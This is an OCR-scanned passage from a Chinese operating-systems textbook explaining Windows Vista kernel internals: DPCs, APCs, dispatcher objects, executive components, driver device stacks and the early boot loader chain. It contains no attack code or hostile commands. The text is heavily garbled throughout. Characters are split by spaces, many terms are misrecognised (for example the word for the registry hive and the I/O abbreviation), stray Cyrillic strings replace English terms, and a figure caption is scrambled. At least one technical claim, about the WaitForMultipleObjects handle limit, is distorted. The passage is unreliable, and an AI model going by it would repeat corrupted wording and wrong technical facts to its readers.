如 果 下 一 个 运行 的 线程 是 在 一 个 不 同 的 地 址 空间 (例如 进程 ) ， 调度 程序 也 必须 改变 地 址 空间 。 详 
细 的 调度 算法 我 们 将 在 本 章 内 谈 到 进程 和 线程 时 讨论 。 

除了 提供 更 高 级 别 的 硬件 抽象 和 线程 转换 机 制 ， 核心 层 还 有 另外 一 项 关键 功能 ,提供 对 下 面 两 种 同 
步 机 制 低级 别 的 支持 ，control 对 象 和 dispatcher 对 象 。Control 对 象 ， 是 核心 层 向 执行 体 提供 抽象 的 CPU 
管理 的 一 种 数据 结构 。 它 们 由 执行 体 来 分 配 ， 但 由 核心 层 提 供 的 例 程 来 操作 。Dispatcher 对 象 是 一 种 普 
通 执行 对 象 ， 使 用 一 种 公用 的 数据 结构 来 同步 。 
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3. 延迟 过 程 调 用 

Control 对 象 包 括 线程 、 中 断 、 定 时 器 、 同 步 、 调 试 等 一 些 原 语 对 象 ， 和 两 个 用 来 实现 DPC 和 APC 的 
特殊 对 象 。DPC (延迟 过 程 调用 ) 对 象 是 用 来 减少 执行 ISR (中 断 服 务 例 程 ) 所 需要 的 时 间 ， 以 响应 从 
特定 的 设备 来 的 中 断 。 

系统 硬件 为 中 断 指 定 了 硬件 优先 级 。 在 CPU 进行 工作 时 也 伴随 着 一 个 优先 级 。CPU 只 响应 比 当前 更 
高 优先 级 的 中 断 。 通 常 的 优先 级 是 0， 包 括 所 有 用 户 态 下 的 优先 级 。 设 备 中 断 发 生 在 优先 级 3 或 更 高 ， 让 
一 个 设备 中 断 的 ISR 以 同一 优先 级 的 中 断 来 执行 是 防止 其 他 不 重要 的 中 断 影响 它 正 在 进行 的 重要 中 断 。 

如 果 ISR 执 行 得 太 长 ， 提 供给 低 优先 级 中 断 的 服务 将 被 推迟 ， 可 能 造成 数据 丢失 或 减缓 系统 的 1 / О 
春 吐 量 。 多 ISR 可 以 在 任何 同一 时 刻 处 理 ， 每 一 个 后 续 的 ISR 是 由 于 产生 了 更 高 优先 级 的 中 断 。 

为 了 减少 处 理 ISR 所 花费 的 时 间 ， 只 有 关键 的 操作 才 执行 ， 如 LO 操作 结果 的 捕捉 和 设备 重 置 。 直 到 
CPU 的 优先 级 降低 ， 且 没有 其 他 中 断 服务 阻塞 ， 才 会 进行 下 一 步 的 中 断 处 理 。DPC 对 象 用 来 表示 将 要 做 
的 工作 ，ISR 调 用 核心 层 排列 DPC 到 特定 处 理 器 上 的 DPC 队列 。 如 果 DPC 在 队列 的 第 一 个 位 置 ， 内 核 会 
登记 一 个 特殊 的 硬件 请 求 让 CPU 在 优先 级 2 产生 中 断 (NT 下 称 为 DISPATCH 级 别 )。 当 最 后 一 个 执行 的 
ISR 完 成 后 ， 处 理 器 的 中 断 级 别 将 回落 到 低 于 2， 这 将 解 开 DPC 处 理 中 断 。 服 务 于 DPC 中 断 的 ISR 将 会 处 
理 内 核 排列 好 的 每 一 个 DPC 对 象 。 

利用 软 中 断 延 迟 中 断 处 理 是 一 种 行 之 有 效 的 减少 ISR 延 迟 时 间 的 方法 。UNIX 和 其 他 系统 在 20 世 纪 
70 年 代 开始 使 用 延迟 处 理 ， 以 处 理 缓慢 的 硬件 和 有 限 的 缓冲 串 行 连接 终端 。ISR 负 责 处 理 从 硬件 提取 字 
符 并 排列 它们 。 在 所 有 高 级 别 的 中 断 处 理 完成 以 后 ， 软 中 断 将 执行 一 个 低 优先 级 的 ISR 做 字符 处 理 ， 比 
如 通过 向 终端 发 送 控制 字符 来 执行 一 个 退 格 键 ， 以 抹 去 最 后 一 个 显示 字符 并 向 后 移动 光标 。 

在 当前 的 Windows 操 作 系统 下 ， 类 似 的 例子 是 键盘 设备 。 当 一 个 键 被 蔽 击 以 后 ， 键 航 ISR 从 寄存 器 
中 读 取 键 值 ， 然 后 重新 使 键盘 中 断 ， 但 并 不 对 下 一 步 的 按键 进行 及 时 处 理 。 相 反 ， 它 使 用 一 个 DPC 去 排 
队 处 理 键 值 ， 直 到 所 有 优先 的 设备 中 断 已 处 理 完成 。 

因为 DPC 在 级 别 2? 上 运行 ， 它 们 并 不 干涉 ISR 设 备 的 执行 ， 在 所 有 排队 中 的 DPC 执行 完成 并 且 CPU 的 
优先 级 低 于 2 之 前 ， 它 们 会 阻止 任何 线程 的 运行 。 设 备 驱 动 和 系统 本 身 必须 注意 不 要 运行 1SR 或 DPC 太 长 
时 间 。 因 为 在 运行 它们 的 时 候 不 能 运行 线程 ，ISR 或 DPC 的 运行 会 使 系统 出 现 延迟 ， 并 且 可 能 在 播放 音 
乐 时 产生 不 连续 ， 因 为 拖延 了 线程 对 声卡 的 音乐 缓冲 区 的 写 操作 。DPC 另 一 个 通常 的 用 处 是 运行 程序 以 
响应 定时 器 中 断 。 为 了 避免 线程 阻塞 ， 要 延长 运行 时 间 的 定时 器 事件 需要 向 内 核 维持 后 台 活动 的 线程 工 
作 池 做 排队 请 求 。 这 些 线程 有 调度 优先 级 12、13 或 15。 我 们 会 在 线程 调度 部 分 看 到 ， 这 些 优先 级 意味 着 
工作 项 目 将 会 先 于 大 多 数 线程 执行 ， 但 是 不 会 打 断 实时 线程 。 

4. 异步 过 程 调用 

另 一 个 特殊 的 内 核 控制 对 象 是 APC (异步 过 程 调用 ) 对 象 。APC 与 DPC 的 相同 之 处 是 它们 都 是 延迟 
处 理 系统 例 行 程序 ， 不 同 之 处 在 于 DPC 是 在 特定 的 CPU 上 下 文中 执行 ， 而 APC 是 在 一 个 特定 的 线程 上 下 
文中 执行 。 当 处 理 一 个 键盘 项 击 操作 时 ，DPC 在 哪 一 个 上 下 文中 运行 是 没有 关系 的 ， 因 为 一 个 DPC 仅仅 
是 处 理 中 断 的 另 一 部 分 ， 中 断 只 需要 管理 物理 设备 和 执行 独立 线程 操作 ， 例 如 在 内 核 空间 的 一 个 缓冲 区 
记录 数据 。 

当 原始 中 断 发 生 时 ，DPC 例 程 运行 在 任何 线程 的 上 下 文中 。 它 利用 IO 系统 来 报告 IO 操作 已 经 完成 ， 
IO 系统 排列 一 个 APC 在 线程 的 上 下 文中 运行 从 而 做 出 原始 的 MO 请 求 ， 在 这 里 它 可 以 访问 处 理 输入 的 线 
程 的 用 户 态 地 址 空间 。 

在 下 一 个 合适 的 时 间 ， 内 核 层 会 将 APC 移 交 给 线程 而 且 调度 线程 运行 。 一 个 APC 被 设计 成 看 上 去 像 
一 个 非 预 期 的 程序 调用 ， 有 些 类 似 于 UNIX 中 的 信号 处 理 程序 。 不 过 在 内 核 态 下 ， 内 核 态 的 APC 为 了 完 
成 O 操 作 ， 而 在 完成 初始 化 MO 操作 的 线程 的 上 下 文中 执行 。 这 使 APC 既 可 以 访问 内 核 态 的 缓冲 区 ， 又 
可 以 访问 用 户 态 下 ， 属 于 包含 线程 的 进程 的 地 址 空间 。 一 个 APC 在 什么 时 候 被 移交 ， 取 决 于 线程 已 经 在 
做 什么 ， 以 及 系统 的 类 型 是 什么 。 在 一 个 多 处 理 器 系统 中 ， 甚 至 是 在 DPC 完成 运行 之 前 ， 接 收 APC 的 线 
程 才 可 以 开始 执行 。 

用 户 态 下 的 APC 也 可 以 用 来 把 用 户 态 的 MO 操作 已 经 完成 的 信息 ， 通 知 给 初始 化 MO 操作 的 线程 。 但 
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只 有 当 内 核 中 的 目标 线程 被 阻塞 和 被 标示 为 准备 接收 APC 时 ， 用 户 态 下 的 APC 才 可 调用 用 户 态 下 的 应 用 
程序 。 但 随 着 用 户 态 堆栈 和 寄存 器 的 修改 ， 为 了 执行 在 ntdll.dll 系 统 库 中 的 APC 调 度 算法 ， 内 核 将 等 待 中 
的 线程 中 断 ,并 返回 到 用 户 态 。APC 调 度 算法 调用 和 1/O 操 作 相关 的 用 户 态 应 用 程序 。 除 了 一 些 1/O 完 成 后 ， 
作为 一 种 执行 代码 方法 的 用 户 态 下 的 APC 外 ，Win32 API 中 的 QueueUserAPC 人 允许 将 APC 用 于 任意 目的 。 

执行 体 也 使 用 除了 IO 完成 之 外 的 一 些 APC 操 作 。 由 于 APC 机 制 精心 设计 为 只 有 当 它 是 安全 的 时 候 
才 提供 APC， 它 可 以 用 来 安全 地 终止 线程 。 如 果 这 不 是 一 个 终止 线程 的 好 时 机 ， 该 线程 将 宣布 它 已 进入 
-个 临界 区 ， 并 延期 交付 APC 直 至 得 到 许可 。 在 获得 锁 或 其 他 资源 之 前 ， 内 核 线程 会 标记 自己 已 进入 临 
界 区 并 延迟 APC， 这 时 ， 它 们 不 能 被 终止 ， 并 仍然 持 有 资源 。 

5. 调度 对 象 

另 一 种 同步 对 象 是 调度 对 象 。 这 是 常用 的 内 核 态 对 象 (一 种 用 户 可 以 通过 句柄 处 理 的 类 型 )， 它 包 
含 一 个 称 为 dispatcher_header 的 数据 结构 ， 如 图 11-15 所 示 。 


执行 体 通知 /同步 标记 
对 象 已 发 信号 态 DISPATCHER_HEADER 
等 待 线程 队列 的 头 


图 11-15 执行 对 象 中 嵌入 的 dispatcher_header 数 据 结构 


它们 包括 信号 器 、 互 斥 体 、 事 件 、 可 等 待定 时 器 和 其 他 一 些 可 以 等 待 其 他 线程 同步 执行 的 对 象 。 它 
们 还 包括 表示 打开 的 文件 的 对 象 、 进 程 、 线 程 和 IPC 端 口 。 调 度数 据 结构 包含 了 表示 对 象 状 态 的 标志 ， 
和 等 待 被 标记 的 对 象 的 线程 队列 。 

同步 原 语 ， 如 信号 器 ， 是 标准 的 调度 对 象 。 另 外 定时 器 、 文 件 、 端 口 线程 和 进程 使 用 调度 对 象 机 制 
去 通知 。 当 一 个 定时 器 开启 、 一 个 文件 1/0 完 成 、 一 个 端口 正在 传输 数据 或 是 一 个 线程 或 进程 终止 时 ， 
相关 的 调度 对 象 会 被 通知 ， 并 唤醒 所 有 等 待 该 事件 的 线程 。 

由 于 Windows 使 用 了 一 个 单一 的 标准 机 制 去 同步 内 核 态 对 象 ， 一 些 专门 的 API 就 无 需 再 等 待 事件 ， 
例如 在 UNIX 中 用 来 等 待 子 进程 的 wait3。 而 通常 情况 下 ， 线 程 要 一 次 等 待 多 个 事件 。 在 UNIX 中 ， 通过 
“select” 系 统 调用 ， 一 个 进程 可 以 等 待 任何 一 个 64 位 网 络 接口 可 以 获得 的 数据 。 在 Windows 中 亦 有 一 -个 
类 似 的 APITWaitForMultipleObjects， 但 是 它 允许 一 个 线程 等 待 任何 类 型 的 有 句柄 的 调度 对 象 。 超 过 64 个 
句柄 可 以 指定 WaitForMultipleObjects， 以 及 一 个 可 选择 的 超时 值 。 线程 随时 准备 运行 任何 一 个 和 句柄 标 
记 相关 的 事件 或 发 生 超时 。 

内 核 使 用 两 个 不 同 的 程序 使 得 线程 等 待 调度 对 象 运行 。 发 出 一 个 通知 对 象 信号 使 每 一 个 等 待 的 线程 
可 以 运行 。 同 步 对 象 仅 使 第 一 个 等 待 的 线程 可 以 运行 ， 用 于 调度 对 象 ， 实 施 锁 元 ， 如 互 斥 体 。 当 一 个 线 
程 等 待 一 个 锁 再 次 开始 运行 ， 它 做 的 第 一 件 事 就 是 再 次 尝试 请 求 锁 。 如 果 一 次 仅 有 一 个 线程 可 以 保留 锁 ， 
其 他 所 有 可 运行 的 线程 可 能 立刻 被 阻塞 ， 从 而 产生 许多 不 必要 的 现场 交换 。 使 用 同步 机 制 和 使 用 通知 机 
制 的 分 派对 象 (dispatcher object) 之 间 的 差别 是 dispatcher_header 结 构 中 的 一 个 标记 。 

另外 ， 在 Windows 代 码 中 互 斥 体 称 为 “ 变 体 ”(mutant) 。 因 为 当 一 个 线程 保留 一 个 出 口 时 ， 它们 需 
要 执行 0S/2 语 义 中 的 非 自动 解锁 ， 看 来 这 是 Cutler 奇 特 的 考虑 。 

6. 执行 体 

如 图 11-13 所 示 ， 在 NTOS 的 内 核 层 以 下 是 执行 体 。 执 行 体 是 用 C 语 言 编写 的 ， 在 结构 上 最 为 独立 
(内 存 管理 是 一 个 明显 的 例外 )， 并 且 经 过 少量 的 修改 已 经 移植 到 新 的 处 理 器 上 (MIPS, x86, PowerPC, 
Alpha、IA64 和 x64)。 执 行 体 包括 许多 不 同 的 组 件 ， 所 有 的 组 件 都 通过 内 核 层 提供 的 抽象 控制 器 来 运行 。 

每 个 组 件 分 为 内 部 和 外 部 的 数据 结构 和 接口 。 每 个 组 件 的 内 部 方法 是 隐藏 的 ， 只 有 组 件 自己 可 以 调 
用 ， 而 外 部 方法 可 以 由 执行 体 的 所 有 其 他 组 件 调用 。 外 部 接口 的 一 个 子 集 由 一 个 ntoskrnlexe 提 供 ， 而 且 
设备 驱动 可 以 链接 到 它们 就 好 像 执 行 体 是 一 个 库 。 微 软 称许 多 执行 体 组 件 为 “管理 器 "， 因为 每 一 个 组 
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件 管理 操作 系统 的 一 部 分 ， 例 如 HO、 内 存 、 进 程 、 对 象 等 。 

对 于 大 多 数 操作 系统 而 言 ， 许 多 功能 在 Windows 上 执行 就 像 库 的 编码 。 除 非 在 内 核 方式 下 运行 ， 它 
的 数据 结构 可 以 被 共享 和 保护 ， 以 避免 用 户 态 下 的 编码 访问 ， 因 此 它 具 有 硬件 状态 的 访问 权限 ， 例 如 
MMU 控 制 寄存 器 。 但 是 另 一 方面 ， 执 行 体 只 是 代表 它 的 调用 者 简单 执行 操作 系统 的 函数 ， 因 此 它 运行 
在 它 的 调用 者 的 线程 中 。 

当 任 何 执行 控制 操作 阻塞 等 待 与 其 他 线程 同步 时 ， 用 户 态 线程 也 会 阻塞 。 这 在 为 一 个 特殊 的 用 户 态 
线程 工作 时 是 有 意义 的 ， 但 是 在 做 一 些 相关 的 内 务 处 理 任务 时 是 不 公平 的 。 当 执行 体 认为 一 些 内 务 处 理 
线程 是 必须 的 时 候 ， 为 了 避免 动 持 当前 的 线程 ， 一 些 内 核 态 线程 就 会 具体 于 特定 的 任务 而 产生 ， 例 如 确 
保 更 改 了 的 页 会 被 回 写 到 硬盘 上 。 

对 于 可 预见 的 低频 率 任务 ， 会 有 一 个 线程 一 秒 运 行 一 次 而 且 由 一 个 长 的 项 目 单 来 处 理 。 对 于 不 可 预 
见 的 工作 ， 有 一 个 之 前 曾经 提 到 的 高 优先 级 的 辅助 线程 地 ， 通 过 将 队列 请 求 和 发 送 辅助 线程 等 待 的 同步 
事件 信号 ， 可 以 用 来 运行 有 界 任务 。 

对 象 管理 器 管理 在 执行 体 使 用 的 大 部 分 内 核 太 对象， 包括 进程 、 线 程 、 文 件 、 信 号 、IO 设 备 及 驱 
动 、 定 时 器 等 。 就 像 之 前 提 到 的 ， 内 核 态 对 象 仅仅 是 内 核 分 配 和 使 用 的 数据 结构 。 在 Windows 中 ， 内 核 
数据 结构 有 许多 共同 特点 ， 即 它们 在 管理 标准 功能 中 特别 有 用 。 

这 些 功 能 由 对 象 管理 器 提供 ,包括 管理 对 象 的 内 存 分 配 和 释放 , 配额 计算 , 支持 通过 句柄 访问 对 象 ， 
为 内 核 态 指 针 引用 保留 引用 计数 ， 在 NT 名 字 空间 给 对 象 命名 ， 为 管理 每 一 个 对 象 的 生命 周期 提供 可 扩 
展 的 机 制 。 需 要 这 些 功能 的 内 核 数据 结构 是 由 对 象 管理 器 来 管理 的 。 其 他 数据 结构 ， 例 如 内 核 层 使 用 的 
控制 对 象 ， 或 仅仅 是 内 核 态 对 象 的 扩展 对 象 ， 不 由 对 象 管理 器 管理 。 

对 象 管理 器 的 每 一 个 对 象 都 有 一 个 类 型 用 来 指定 这 种 类 型 的 对 象 的 生命 周期 怎样 被 管理 。 这 些 不 是 
面向 对 象 意义 中 的 类 型 ， 而 仅仅 是 当 对 象 类 型 产生 时 的 一 个 指定 参数 集合 。 为 了 产生 一 个 新 的 类 型 ， 一 
个 操作 元 件 只 需要 调用 一 个 对 象 管理 器 API 即 可 。 对 象 在 Windows 的 函数 中 很 重要 ， 在 下 面 的 章节 中 将 
会 讨论 有 关 对 象 管理 器 的 更 多 细节 。 

IO 管理 器 为 实现 IO 设备 驱动 提供 了 一 个 框架 ， 同 时 还 为 设备 上 的 配置 、 访 问 和 完成 操作 提供 一 些 
特定 的 运行 服务 。 在 Windows 中 ， 设 备 驱动 器 不 仅仅 管理 硬件 设备 ， 它 们 还 为 操作 系统 提供 可 扩展 性 。 
在 其 他 类 型 的 操作 系统 中 被 编译 进 内 核 的 功能 是 被 Windows 内 核 动态 装载 和 链接 的 ， 包 括 网 络 协议 栈 和 
文件 系统 。 

最 新 的 Windows 版 本 对 在 用 户 态 上 运行 设备 驱动 程序 有 更 多 的 支持 ， 这 对 新 的 设备 驱动 程序 是 首选 
的 模式 。Windows Vista 有 超过 100 万 不 同 的 设备 驱动 程序 ， 工 作 着 超过 了 100 万 不 同 的 设备 。 这 就 意味 着 
要 获取 正确 的 代码 。 漏 洞 导 致 设备 在 用 户 态 的 进程 中 崩溃 而 不 能 使 用 ， 这 比 造成 对 系统 进行 检测 错误 要 
好 得 多 。 错 误 的 内 核 态 设备 驱动 是 导致 Windows 可 怕 的 BSOD (Жж Ж ж.) 的 主要 来 源 ， 它 是 Windows 侦 
测 到 致命 的 内 核 态 错误 并 关机 或 重新 启动 系统 。 蓝 屏 死 机 可 以 类 比 于 UNIX 系 统 中 的 内 核 恐 做 。 

在 本 质 上 ， 微 软 现 在 已 经 正式 承认 那些 在 microkernels 研 究 领 域 的 如 MINIX 3 和 L4 的 研究 员 多 年 来 
都 知道 的 结果 : 在 内 核 中 有 更 多 的 代码 ， 那 么 内 核 中 就 有 更 多 缺陷 。 由 于 设备 驱动 程序 占 了 70% 的 内 核 
代码 ， 更 多 的 驱动 程序 可 以 进入 用 户 态 进 程 ， 其 中 一 个 bug 只 会 触发 一 个 单一 驱动 器 的 失败 (而 不 是 降 
低 整 个 系统 )。 从 内 核 到 用 户 态 进程 的 代码 移动 趋势 将 在 未 来 几 年 加 速 发 展 。 

J/O 管 理 器 还 包括 即 插 即 用 和 电源 管理 设施 。 当 新 设备 在 系统 中 被 检测 到 ， 即 插 即 用 就 开始 工作 。 该 
即 插 即 用 设备 的 子 模块 首先 被 通知 。 它 与 服务 一 起 工作 ， 即 用 户 态 即 插 即 用 管理 器 ， 找 到 适当 的 设备 驱动 
程序 并 加 载 到 系统 中 。 找 到 合适 的 设备 驱动 程序 并 不 总 是 很 容易 ， 有 时 取决 于 先进 的 匹配 具体 软件 设备 特 
定 版 本 的 驱动 程序 。 有 时 一 个 单一 的 设备 支持 一 个 由 不 同 公司 开发 的 多 个 驱动 程序 所 支持 的 标准 接口 。 

电源 管理 能 降低 能 源 消耗 ， 延 长 笔记 本 电脑 电池 寿命 ， 保 存 台 式 电脑 和 服务 器 能 量 。 正 确 使 用 电源 
管理 是 具有 挑战 性 的 ， 因 为 在 把 设备 和 buses 连 接 到 CPU 和 内 存 时 有 许多 微妙 的 依赖 性 。 电 力 消耗 不 只 是 
由 设备 供电 时 的 影响 ， 而 且 还 由 CPU 的 时 钟 频率 影响 ， 这 也 是 电源 管理 在 控制 。 

我 们 会 在 11.7 节 对 1/O 进 一 步 研究 和 以 及 在 11.8 节 中 介绍 最 重要 的 NT 文件 系统 NTFS。 

进程 管理 管理 着 进程 和 线程 的 创建 和 终止 ， 包 括 建立 规则 和 参数 指导 它们 。 但 是 线程 运行 方面 由 核 
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心 层 决定 ， 它 控制 着 线程 的 调度 和 同步 ， 以 及 它们 之 间 相 互 控制 的 对 象 ， 如 APC。 进 程 包含 线程 、 地 址 
空间 和 一 个 可 以 用 来 处 理 进程 指定 内 核 态 对 象 的 句柄 表 。 进 程 还 包括 调度 器 进行 地 址 空间 交换 和 管理 进 
程 中 的 具体 硬件 信息 〈 如 段 描述 符 ) 所 需要 的 信息 。 我 们 将 在 11.4 节 研究 进程 和 线程 的 管理 。 

执行 内 存 管理 器 实现 了 虚拟 内 存 架构 的 需求 分 页 。 它 负责 管理 虚拟 页 映射 到 物理 页 帧 ， 管 理 现 有 的 
物理 帧 ， 和 使 用 备份 管理 磁盘 上 页 面 文件 ， 这 些 页 面 文件 是 用 来 备份 那些 不 再 需要 加 载 到 内 存 中 的 虚拟 
页 的 私有 实例 。 该 内 存 管理 器 还 为 大 型 服务 器 应 用 程序 提供 了 特殊 功能 ， 如 数据 库 和 编程 语言 运行 时 的 
组 件 ， 如 垃圾 收集 器 。 我 们 将 在 11.5 节 中 研究 内 存 管理 。 

内 存 管理 器 优化 IO 的 性 能 ， 文 件 系 统 内 核 虚拟 地 址 空间 保持 一 个 内 存 的 文件 系统 页 。 内 存 管理 器 
使 用 虚拟 的 地 址 进行 缓存 ， 也 就 是 说 ， 按 照 它 们 文件 所 在 位 置 来 组 织 缓存 页 。 这 不 同 于 物理 块 内 存 ， 例 
如 在 UNIX 中 ， 系 统 为 原始 磁盘 卷 保持 一 个 物理 地 址 块 的 内 存 。 

内 存 的 管理 是 使 用 内 存 映射 文件 来 实现 的 。 实 际 的 缓存 是 由 内 存 管理 器 完成 。 内 存 管理 器 需要 关心 
的 只 是 文件 的 哪些 部 分 需要 内 存 ， 以 确保 缓存 的 数据 即时 地 剧 新 到 磁盘 中 ， 并 管理 内 核 虚 拟 地 址 映射 组 
存 文件 页 。 如 果 一 个 页 所 需 的 MO 文件 在 缓存 中 没有 ， 该 页 在 使 用 内 存 管理 器 时 将 会 发 生 错误 。 我 们 会 
在 11.6 节 中 学 习 内 存 管理 器 。 

安全 引用 监视 器 (security reference monitor) 执行 Windows 详 细 的 安全 机 制 ， 以 支持 计算 机 安全 要 
求 的 国际 标准 的 通用 标准 (Соттоп Стійегіа), 一 个 由 美国 国防 部 的 橘 皮 书 的 安全 要 求 发 展 而 来 的 标准 。 
这 些 标准 规定 了 一 个 符合 要 求 的 系统 必须 满足 的 大 量规 则 ， 如 登录 验证 、 审 核 、 零 分 配 的 内 存 等 更 多 的 
规则 。 一 个 规则 要 求 ， 所 有 进入 检查 都 由 系统 中 的 一 个 模块 进行 检查 。 在 Windows 中 此 模块 就 是 内 核 中 
的 安全 监视 器 。 我 们 将 在 11.9 节 中 更 详细 地 学 习 安全 系统 。 

执行 体 中 包括 其 他 一 些 组 件 ， 我 们 将 简要 介绍 。 如 前 所 述 ， 配 置 管理 实现 注册 表 的 执行 组 件 。 注 册 
表 中 包含 系统 配置 数据 的 文件 的 系统 文件 称 为 储 集 (муе), 最 关键 的 储 梨 是 系统 启动 时 加 载 到 内 存 的 
系统 储 果 。 只 有 在 执行 体 成 功 地 初始 化 其 主要 组 件 ， 包 括 了 系统 磁盘 的 IO 驱动 程序 ， 之 后 才 是 文件 系 
统 中 储 寻 关联 的 内 存 中 的 储 时 副本 。 因 此 ， 如 果 试图 启动 系统 时 发 生 不 测 ， 磁盘 上 的 副本 是 不 太 可 能 被 
损坏 的 。 

LPC 的 组 成 部 分 提供 了 运行 在 同一 系统 的 进程 之 间 的 高 效 内 部 通信 。 这 是 一 个 基 于 标准 的 远程 过 程 
调用 (RPC) 功能 ， 实 现 客户 机 /服务 器 的 处 理 方式 的 数据 传输 。 RPC 还 使 用 命名 管道 和 TCP/IP 作 为 传输 

在 Windows Vista (现在 称 为 ALPC、 高 级 LPC) 中 LPC 大 大 加 强 了 对 RPC 新 功能 的 支持 ， 包 括 来 自 
内 核 态 组 件 的 RPC， 如 驱动 。LPC 是 NT 原始 设计 中 的 一 个 重要 的 组 成 部 分 ， 因为 它 被 子 系统 层 使 用 ， 实 
现 运行 在 每 个 进程 和 子 系统 进程 上 库存 例 程 的 通信 ， 这 实现 了 一 个 特定 操作 系统 的 个 性 化 功能 ， 如 
Win32 或 POSIX。 

Windows NT 4.0 中 的 许多 代码 与 Win32 进 入 内 核 的 图 形 界面 相关 ， 因 为 当时 的 硬件 无 法 提供 所 需 的 
性 能 。 该 代码 以 前 位 于 csrss.exe 子 系统 进程 ， 执 行 Win32 接 口 。 以 内 核 为 基础 的 图 形 用 户 界面 的 代码 位 
于 一 个 专门 的 内 核 驱动 win32k.sys 中 。 这 一 变化 预计 将 提高 Win32 的 性 能 ， 因为 额外 的 用 户 态 /内 核 态 的 
转换 和 转换 地 址 空间 的 成 本 经 由 LPC 执 行 通信 是 被 清除 的 。 但 并 没 能 像 预 期 的 那样 取得 成 功 ， 因 为 运行 
在 内 核 中 的 代码 要 求 是 非常 严格 的 ， 运行 在 内 核 态 上 的 额外 消耗 抵消 了 因 减 少 交换 成 本 获得 的 收益 。 

7. 设备 驱动 程序 

最 后 一 部 分 图 11-13 是 设备 驱动 程序 的 组 成 。 在 Windows 中 的 设备 驱动 程序 的 动态 链接 库 是 由 NTOS 
装载 。 虽 然 它们 主要 是 用 来 执行 特定 硬件 的 驱动 程序 ， 如 物理 设备 和 1/O 总 线 ， 设备 驱动 程序 的 机 制 也 
可 作为 内 核 态 的 一 般 可 扩展 性 的 机 制 。 如 上 所 述 ， 大 部 分 的 Win32 子 系统 是 作为 一 个 驱动 程序 被 加 载 。 

J/O 管 理 器 组 织 的 数据 按照 一 定 的 路 线 流 经 过 每 个 设备 实例 ， 如 图 11-16。 这 个 路 线 称 为 设备 栈 ， 由 
分 配 到 这 条 路 线 上 的 内 核 设备 对 象 的 私有 实例 组 成 。 设 备 堆栈 中 的 每 个 设备 对 象 与 特定 的 驱动 程序 对 象 
相关 联 ， 其 中 包含 日 常 使 用 的 MO 请 求 的 数据 包 流 经 该 设备 堆栈 的 表 。 在 某 些 情况 下 ， 堆栈 中 的 设备 驱 
动 程序 表示 其 唯一 的 目的 是 在 某 一 特定 的 设备 上 过 滤 1/0 操 作 目 标 、 总 线 或 网 络 驱 动 器 。 过 滤器 的 使 用 
是 有 一 些 原因 的 。 有 时 预 处 理 或 后 处 理 IO 操作 可 以 得 到 更 清晰 的 架构 ， 而 其 他 时 候 只 是 以 实用 为 出 发 
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点 ,因为 没有 修改 驱动 的 来 源 和 权限 ， 过 滤器 是 用 来 解决 这 个 问题 的 。 过 滤器 还 可 以 全 面 执行 新 的 功能 ， 
如 把 磁盘 分 区 或 多 个 磁盘 分 成 RAID 卷 。 


С, 文件 系统 过 滤器 | 一 >| 文件 系统 过 池 加 史 动 各 序 | |D， 文 件 系统 过 下 器 
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C: 磁盘 分 区 j| вайа | о. 磁盘 分 区 
№ 2 М 2 $ J 
Үү Y 
设备 栈 由 设备 对 每 一 个 设备 对 象 部 链接 设备 栈 由 设备 对 象 组 
象 组 成 ， 比 如 С 着 带 有 人 口 点 的 驱动 对 象 R, Над. D 


图 11-16 简单 描绘 两 个 NTFS 文 件 卷 的 设备 栈 。1/O 请 求 包 由 上 往 下 通过 栈 。 每 一 级 堆栈 
中 的 相关 驱动 中 的 适当 程序 被 调用 。 该 设备 栈 由 分 配给 每 个 堆栈 的 设备 对 象 组 成 


文件 系统 作为 驱动 程序 被 加 载 。 每 个 文件 系统 卷 的 实例 ， 有 一 个 设备 对 象 创建 ， 并 作为 该 设备 堆栈 
卷 的 一 部 分 。 这 是 设备 对 象 将 与 驱动 对 象 的 文件 系统 适当 的 卷 格式 发 生 关联 。 特 别 过 滤 驱 动 程序 ， 称 为 
文件 系统 过 波 驱 动 程序 ， 可 以 在 插 和 设备 对 象 之 前 ， 文 件 系统 设备 对 象 将 功能 应 用 于 被 发 送 到 每 个 卷 的 
J/O 请 求 ， 如 数据 读 取 或 写 人 的 病毒 检查 。 

网 络 协议 也 作为 使 用 IO 模型 的 驱动 被 装载 起 来 ， 例 如 Windows Vista 整 合 的 IPv4/IPv6 TCP/IP 实 现 。 
对 于 老 的 基于 MS-DOS 的 Windows 操 作 系 统 ，TCP/IP 驱 动 实现 了 一 个 特殊 的 Windows 1/O 模 型 网 络 接口 
上 的 协议 。 还 有 其 他 一 些 驱 动 也 执行 这 样 的 安排 ， 其 中 的 Windows 小 型 端口 。 共 享 功 能 是 在 一 个 类 驱动 
程序 中 。 例 如 ，SCSI 或 IDE 磁 盘 或 USB 设 备 通用 功能 是 作为 一 类 驱动 提供 的 ， 这 一 类 驱动 为 这 些 设备 的 
每 个 特定 类 型 提供 微 端口 驱动 程序 连接 为 一 个 库 。 

我 们 在 本 章 不 讨论 任何 特定 的 设备 驱动 ， 但 是 在 11.7 节 中 将 更 为 详细 地 介绍 有 关 1/0 管 理 器 如 何 与 
设备 驱动 互动 。 
11.3.2 启动 Windows Vista 

使 用 操作 系统 需要 运行 几 个 步骤 。 当 电脑 打开 时 ，CPU 初 始 化 硬件 。 然 后 开始 执行 内 存 中 的 一 个 程 
序 。 但 是 ， 唯 一 可 用 的 代码 是 由 计算 机 制造 商 初始 化 的 某 些 非 易 失 性 的 CMOS 内 存 形式 (有 了 时 被 用 户 更 
新 ， 在 一 个 进程 中 称 为 闪存 )。 在 大 多 数 PC 机 中 ， 最 初 的 初始 化 程序 是 BIOS (基本 输入 /输出 系统 ) 1 
知道 如 何在 一 台 PC 机 上 找到 设备 的 标准 类 型 。BIOS 提 供 了 Windows Vista 在 磁盘 驱动 器 分 区 开始 时 首先 
装载 的 小 引导 程序 。 

引导 程序 知道 如 何在 根 目录 的 文件 系统 卷 之 外 阅读 足够 的 信息 去 发 现 独立 的 Windows BootMgr 程 
序 。BootMgr 确 定 系统 是 否 已 经 处 于 休眠 或 待机 模式 (特别 省 电 模式 ,系统 不 需要 重启 就 可 以 重新 打开 )。 
如 果 是 ，BootMgr 加 载 和 执行 WinResume.exe。 否 则 加 载 和 执行 WinLoad ,exe 执行 新 的 启动 。WinLoad 加 
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载 系统 启动 组 件 到 内 存 中 : 内 核 /执行 体 (通常 是 Ntoskrnl.exe)、HAL(hal.dll)， 该 文件 包含 系统 储 梨 ， 
Win32k.sys 驱 动 包含 Win32 子 系统 的 内 核 太 部分， 以 及 任何 其 他 在 系统 储 巢 中 作为 启动 驱动 程序 列 出 的 
驱动 程序 的 镜像 ， 这 就 意味 着 在 系统 启动 时 ， 它 们 是 必需 的 。 

